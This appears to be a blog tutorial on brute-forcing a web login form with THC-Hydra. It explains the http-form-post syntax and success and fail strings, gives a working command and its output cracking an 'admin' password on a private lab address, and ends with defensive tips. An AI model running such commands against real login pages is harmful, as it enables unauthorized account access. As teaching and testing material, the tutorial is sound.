Let's break down the "/login/log.php:user=^USER^&password=^PASS^:S=success
 
/login/ = path
log.php = Action page 
user = First parameter
^USER^ = Use the strings from -l or -L
password = Second parameter
^PASS^ =  Use the strings from -p or -P(usually dictionary file or for brute force option -x)
S=success = When hydra see success message from the action page it will stop mean , Successfully cracked!
This is really important. If it has been set wrong then hydra will give false positive. So careful! 
 

Hydra command 2:

hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"

Output:

root@find:~/Desktop# hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-09 06:38:28
[DATA] 4 tasks, 1 server, 935 login tries (l:1/p:935), ~233 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Admin" - 1 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Administration" - 2 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "crm" - 3 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CVS" - 4 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS" - 5 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS25" - 6 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS31" - 7 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "INSTALL_admin" - 8 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Log" - 9 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "yourpass" - 10 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Logs" - 11 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Pages" - 12 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "youradmin" - 13 of 935 [child 2]
[80][www-form] host: 192.168.206.1 login: admin password: yourpass
1 of 1 target successfully completed, 1 valid password found

In this command brute forced the page with fail string. When input bad password , the page generate “fail” message. So we tell the thc-hydra that keep attacking whenever you see the message “fail” . So hydra won’t stop until it see other strings instead “fail”.  But we need to be careful that if in the success page has “fail” string in somewhere then hydra will give you false results.  Depend on the situation ! For example a success page might have following welcome message:

Welcome User! We are not responsible if you are fail to protect your confidential information. Be careful from hacker!

In this case hydra will give false result. So think , how you want to set fail string!

Some tips against brute force:
1. Use strong password.
2. Login page should have captcha.
3. Server should be counting the fail attempt and block the ip after few fail attempt of login.

Hope you enjoyed!